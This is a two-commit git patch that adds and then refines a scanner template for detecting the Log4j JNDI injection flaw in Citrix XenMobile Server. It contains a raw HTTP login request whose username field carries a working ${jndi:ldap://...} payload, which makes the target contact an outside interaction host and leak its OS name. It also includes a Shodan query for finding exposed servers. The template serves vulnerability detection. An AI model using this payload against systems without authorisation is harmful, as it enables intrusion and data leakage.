From fe3ba681b1bdb1f4a06c6adb29bd17ffcb0d654a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Sep 2022 12:14:52 +0530 Subject: [PATCH 1/2] Create xenmobile-server-log4j.yaml --- .../other/xenmobile-server-log4j.yaml | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 vulnerabilities/other/xenmobile-server-log4j.yaml diff --git a/vulnerabilities/other/xenmobile-server-log4j.yaml b/vulnerabilities/other/xenmobile-server-log4j.yaml new file mode 100644 index 0000000000..968ddb01d1 --- /dev/null +++ b/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -0,0 +1,47 @@ +id: xenmobile-server-log4j + +info: + name: Citrix XenMobile Server - Remote Code Execution (Apache Log4j) + author: DhiyaneshDK + severity: critical + reference: https://support.citrix.com/article/CTX335705/citrix-security-advisory-for-cve202144228-cve202145046-cve202145105-and-cve202144832 + metadata: + verified: true + shodan-query: title:"XenMobile" + tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast + +requests: + - raw: + - | + POST /zdm/cxf/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{BaseURL}} + Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp + + login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output From fd196d9159ff97567b99fd169e48123967e1602b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 21 Oct 2022 14:04:41 +0530 Subject: [PATCH 2/2] Update xenmobile-server-log4j.yaml --- vulnerabilities/other/xenmobile-server-log4j.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/vulnerabilities/other/xenmobile-server-log4j.yaml b/vulnerabilities/other/xenmobile-server-log4j.yaml index 968ddb01d1..0ddd6f0863 100644 --- a/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -13,6 +13,7 @@ info: requests: - raw: - | + @timeout: 20s POST /zdm/cxf/login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 @@ -35,6 +36,11 @@ requests: regex: - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - type: word + part: body + words: + - '

500 Server Internal Error' + extractors: - type: kval kval: